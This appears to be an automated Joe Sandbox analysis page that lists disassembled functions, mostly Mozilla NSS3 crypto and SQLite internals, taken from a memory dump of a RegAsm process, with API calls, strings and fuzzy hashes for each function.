Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$n&l
API String ID: 1003633598-3103191249
Opcode ID: d5bde0bc67e2e86bf75454f369fcca52b1be4d6d4ff98711e4acea6bd201fb75
Instruction ID: 31fa5a4fd0b92578beabb972e7cde58b43f5bb2db93536a2f26c611e0791db78
Opcode Fuzzy Hash: d5bde0bc67e2e86bf75454f369fcca52b1be4d6d4ff98711e4acea6bd201fb75
Instruction Fuzzy Hash: 18212B7461610C9BDB00DB65DD8CB9E37B5EB4231CF044425EC09ABB82DF30A948CFA5

Function 6C19ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C19DE64), ref: 6C19ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C19ED22

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

PL_FreeArenaPool.NSS3(?), ref: 6C19ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C19ED6B
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C19ED38

Part of subcall function 6C0D4C70: TlsGetValue.KERNEL32(?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4C97
Part of subcall function 6C0D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CB0
Part of subcall function 6C0D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C19ED52
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C19ED83
PL_FreeArenaPool.NSS3(?), ref: 6C19ED95
PL_FinishArenaPool.NSS3(?), ref: 6C19ED9D

Part of subcall function 6C1B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C1B127C,00000000,00000000,00000000), ref: 6C1B650E

Strings

security, xrefs: 6C19ED06

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: d0acc6ea1e230675e9de4e6c7a2da106610186db050331a5cc9924ef8537d41f
Instruction ID: 1ed53063f06b84522e228974a8f1a71f17e00a926a3ce35de0c09bb873ff0871
Opcode Fuzzy Hash: d0acc6ea1e230675e9de4e6c7a2da106610186db050331a5cc9924ef8537d41f
Instruction Fuzzy Hash: EC113DB590070C67E6105765EC88BBB72B8BF1160CF050524EC5572E91FB35A60CCAD6

Function 6C260EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C142357), ref: 6C260EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C142357), ref: 6C260EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C260EE6

Part of subcall function 6C2609D0: PR_Now.NSS3 ref: 6C260A22
Part of subcall function 6C2609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C260A35
Part of subcall function 6C2609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C260A66
Part of subcall function 6C2609D0: PR_GetCurrentThread.NSS3 ref: 6C260A70
Part of subcall function 6C2609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C260A9D
Part of subcall function 6C2609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C260AC8
Part of subcall function 6C2609D0: PR_vsmprintf.NSS3(?,?), ref: 6C260AE8
Part of subcall function 6C2609D0: EnterCriticalSection.KERNEL32(?), ref: 6C260B19
Part of subcall function 6C2609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C260B48
Part of subcall function 6C2609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C260C76
Part of subcall function 6C2609D0: PR_LogFlush.NSS3 ref: 6C260C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C260EFA

Part of subcall function 6C14AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C14AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C260F2B

Strings

Aborting, xrefs: 6C260EB3
Assertion failure: %s, at %s:%d, xrefs: 6C260ED9, 6C260EE5, 6C260F06, 6C260F0B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 2261c392fef5cac918ae18faeee3996ce905ba6ea72370580d2d5d304a2e973a
Instruction ID: 8f9b7b58fa80ad19bef41293c6c43dc93fb0d3ab44c1382dd919b27c4b7a1365
Opcode Fuzzy Hash: 2261c392fef5cac918ae18faeee3996ce905ba6ea72370580d2d5d304a2e973a
Instruction Fuzzy Hash: ADF0A4B99001187BDB007BA1EC4DC9F3E2DDF46A64F004424FD0956A42DA36E95496B2

Function 6C1C4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C1C4DCB

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C1C4DE1

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C1C4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1C4E59

Part of subcall function 6C1AFAB0: free.MOZGLUE(?,-00000001,?,?,6C14F673,00000000,00000000), ref: 6C1AFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C28300C,00000000), ref: 6C1C4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C1C4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C1C4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1C521A

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: b4c4d6218db50dd79d433a181e1c672c0d7b64d2a52816cd32021fc22625aef0
Instruction ID: b026561794faa1254871895043fab55b3e44b2136d0d483c475276391d9c8070
Opcode Fuzzy Hash: b4c4d6218db50dd79d433a181e1c672c0d7b64d2a52816cd32021fc22625aef0
Instruction Fuzzy Hash: CEF19C71F04209CBDB04CF58D8407AEB7B2BF65318F254169E915AB781E739E981CF92

Function 6C1C0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C1C2C2A), ref: 6C1C0C81

Part of subcall function 6C1ABE30: SECOID_FindOID_Util.NSS3(6C16311B,00000000,?,6C16311B,?), ref: 6C1ABE44

Part of subcall function 6C198500: SECOID_GetAlgorithmTag_Util.NSS3(6C1995DC,00000000,00000000,00000000,?,6C1995DC,00000000,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C198517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1C0CC4

Part of subcall function 6C1AFAB0: free.MOZGLUE(?,-00000001,?,?,6C14F673,00000000,00000000), ref: 6C1AFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1C0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C1C0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C1C0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C1C0D7D
free.MOZGLUE(00000000), ref: 6C1C0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1C0DC1
free.MOZGLUE(00000000), ref: 6C1C0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1C0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1C0E0F

Part of subcall function 6C1995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C1995E0
Part of subcall function 6C1995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C1995F5
Part of subcall function 6C1995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C199609
Part of subcall function 6C1995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C19961D
Part of subcall function 6C1995C0: PK11_GetInternalSlot.NSS3 ref: 6C19970B
Part of subcall function 6C1995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C199756
Part of subcall function 6C1995C0: PK11_GetIVLength.NSS3(?), ref: 6C199767
Part of subcall function 6C1995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C19977E
Part of subcall function 6C1995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C19978E

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: a4efb2ecf6bb8bb2434a26e1516fc69efe7fa5f96780d065ad98eba2259b39c4
Instruction ID: 66b94df6f2d9e61c35d15d321fd991e82457883d2c902f716191e193ece82cf9
Opcode Fuzzy Hash: a4efb2ecf6bb8bb2434a26e1516fc69efe7fa5f96780d065ad98eba2259b39c4
Instruction Fuzzy Hash: CD41B2F5A01246ABEB009F64DC45BFF7674AF14308F104124ED1967B41EB39AA18CBE2

Function 6C154FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C2A0148,?,6C166FEC), ref: 6C15502A
PR_NewLock.NSS3(00000001,00000000,6C2A0148,?,6C166FEC), ref: 6C155034
PL_NewHashTable.NSS3(00000000,6C1AFE80,6C1AFD30,6C1FC350,00000000,00000000,00000001,00000000,6C2A0148,?,6C166FEC), ref: 6C155055
PL_NewHashTable.NSS3(00000000,6C1AFE80,6C1AFD30,6C1FC350,00000000,00000000,?,00000001,00000000,6C2A0148,?,6C166FEC), ref: 6C15506D

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 4274220ab0c1d5ac58f20d79ebf25925811f7583b6f2a2b4f537ac9c68dfd704
Instruction ID: 1fc391d5534ceb17f4c4c73b7bf2f48fcbc0240c6cdf89496ccb9c75d0321d24
Opcode Fuzzy Hash: 4274220ab0c1d5ac58f20d79ebf25925811f7583b6f2a2b4f537ac9c68dfd704
Instruction Fuzzy Hash: EA31D2F1B013109BEF109A69884CB5B3AB8DB2374CF424625EE29A3682D375D414CBE5

Function 6C0F2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0F2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C0F2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C0F3005
memcpy.VCRUNTIME140(?,?,?), ref: 6C0F30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0F3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C0F3178

Strings

%s at line %d of [%.10s], xrefs: 6C0F3171
database corruption, xrefs: 6C0F316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C0F3022, 6C0F3156, 6C0F3162, 6C0F318A, 6C0F3196, 6C0F31A2, 6C0F31AE, 6C0F31BA, 6C0F31C6

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: f88fe2649742b0ef3b51cd8e4ddf5845ad6bea6c2b9a67ed1b945062288e0790
Instruction ID: 2af6286bd80b8efad9ec927a07cfe8e484ed739147cb0530efb56c16c4064e39
Opcode Fuzzy Hash: f88fe2649742b0ef3b51cd8e4ddf5845ad6bea6c2b9a67ed1b945062288e0790
Instruction Fuzzy Hash: 33B1BD70E052199BCB08CF9DC885AEEB7F1BB4C714F54402AEC59A7B41D7749982CBA1

Function 6C142D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C142D69

Strings

P&l, xrefs: 6C142E74, 6C142EC5, 6C142F32, 6C142F5C
winSeekFile, xrefs: 6C142E9C
@&l, xrefs: 6C142E24
winUnmapfile2, xrefs: 6C142F7F
&l, xrefs: 6C142DD0
winUnmapfile1, xrefs: 6C142F55
winTruncate1, xrefs: 6C142EBE
winTruncate2, xrefs: 6C142EF8

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: __allrem
String ID: @&l$P&l$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$&l
API String ID: 2933888876-3102866996
Opcode ID: eae35b32af2c3797ff6ae80b96641f01d094d1370e2968f62ac1e41c10e02d2a
Instruction ID: 16d569c22700e890d039d5ed7d02c64bd187a67ee4c81953b3614c9aefaf4ae4
Opcode Fuzzy Hash: eae35b32af2c3797ff6ae80b96641f01d094d1370e2968f62ac1e41c10e02d2a
Instruction Fuzzy Hash: E1619E71B002099FDB04CF68D898AAA77B1FF49314F108528ED15EB7D0DB35AD46CB91

Function 6C16FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C16FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C16FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C16FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C16FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C16FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C16FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C16FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C16FD84

Strings

:, xrefs: 6C16FD78

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 77ef0180d3c449f26302d463d109f1c00074a1cd41f0d7bca07439c825cc2c55
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: E931D4B6D002159BEB018BA6DC45BAFB7A8EF54358F150134DD24A7F00E775E928C7E2

Function 6C150F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C150F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C150F84

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C16F59B,6C27890C,?), ref: 6C150FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C150FC1

Part of subcall function 6C1B0BE0: malloc.MOZGLUE(6C1A8D2D,?,00000000,?), ref: 6C1B0BF8
Part of subcall function 6C1B0BE0: TlsGetValue.KERNEL32(6C1A8D2D,?,00000000,?), ref: 6C1B0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C150FDB
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C150FEF
PL_FreeArenaPool.NSS3(?), ref: 6C151001
PL_FinishArenaPool.NSS3(?), ref: 6C151009

Strings

security, xrefs: 6C150F5C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: dd9ae19e1011dcbde8d079812a905e49e34e19997dc0a473556d6cda0d31aa74
Instruction ID: 4b29c87a1c24f2176e4918f25f9e51d8230da1c6e8934904920e0c42c1660e2c
Opcode Fuzzy Hash: dd9ae19e1011dcbde8d079812a905e49e34e19997dc0a473556d6cda0d31aa74
Instruction Fuzzy Hash: 8E2104B1904308ABE7109F25DC80BABB7B4EF5465CF148519FC18A7701FB32E959CBA2

Function 6C156DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C157D8F,6C157D8F,?,?), ref: 6C156DC8

Part of subcall function 6C1AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C1AFE08
Part of subcall function 6C1AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C1AFE1D
Part of subcall function 6C1AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C1AFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C157D8F,?,?), ref: 6C156DD5

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C278FA0,00000000,?,?,?,?,6C157D8F,?,?), ref: 6C156DF7

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C156E35

Part of subcall function 6C1AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C1AFE29
Part of subcall function 6C1AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C1AFE3D
Part of subcall function 6C1AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C1AFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C156E4C

Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C278FE0,00000000), ref: 6C156E82

Part of subcall function 6C156AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C15B21D,00000000,00000000,6C15B219,?,6C156BFB,00000000,?,00000000,00000000,?,?,?,6C15B21D), ref: 6C156B01
